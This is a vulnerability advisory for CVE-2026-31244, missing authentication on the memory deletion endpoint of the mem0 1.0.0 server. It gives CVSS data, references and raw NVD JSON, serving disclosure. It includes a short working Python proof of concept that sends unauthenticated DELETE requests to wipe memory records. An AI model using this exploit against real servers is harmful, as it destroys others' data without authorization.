CVE-2026-31244

Description

The mem0 1.0.0 server lacks authentication and authorization controls for its memory deletion API endpoint (DELETE /memories/{memory_id}). The endpoint allows unauthenticated users to delete arbitrary memory records without verifying their identity or permissions. A remote attacker can exploit this by sending unauthenticated DELETE requests to remove any memory entry from the database, leading to unauthorized data loss and potential denial of service.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:mem0:mem0:1.0.0:*:*:*:*:*:*:* - VULNERABLE

mem0 1.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable mem0 server
target_url = "http://target-server:port/memories/{memory_id}"

# The ID of the memory to delete
memory_id = "12345"

# Construct the full URL
exploit_url = target_url.replace("{memory_id}", memory_id)

try:
    # Send unauthenticated DELETE request
    response = requests.delete(exploit_url)

    # Check if the deletion was successful
    if response.status_code == 200 or response.status_code == 204:
        print(f"[+] Success: Memory with ID {memory_id} has been deleted.")
    else:
        print(f"[-] Failed: Server returned status code {response.status_code}")
        print(f"Response: {response.text}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31244
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31244
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31244/
[4] VulDB https://vuldb.com/cve/CVE-2026-31244
[5] https://github.com/mem0ai/mem0
[6] https://www.notion.so/CVE-2026-31244-35d1e1393188818b8039c50adc75996c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31244", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:52.897", "lastModified": "2026-05-14T18:38:33.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mem0 1.0.0 server lacks authentication and authorization controls for its memory deletion API endpoint (DELETE /memories/{memory_id}). The endpoint allows unauthenticated users to delete arbitrary memory records without verifying their identity or permissions. A remote attacker can exploit this by sending unauthenticated DELETE requests to remove any memory entry from the database, leading to unauthorized data loss and potential denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mem0:mem0:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "CBD5639B-9888-4EF9-8E41-CC05DBA4720E"}]}]}], "references": [{"url": "https://github.com/mem0ai/mem0", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.notion.so/CVE-2026-31244-35d1e1393188818b8039c50adc75996c", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory"]}]}}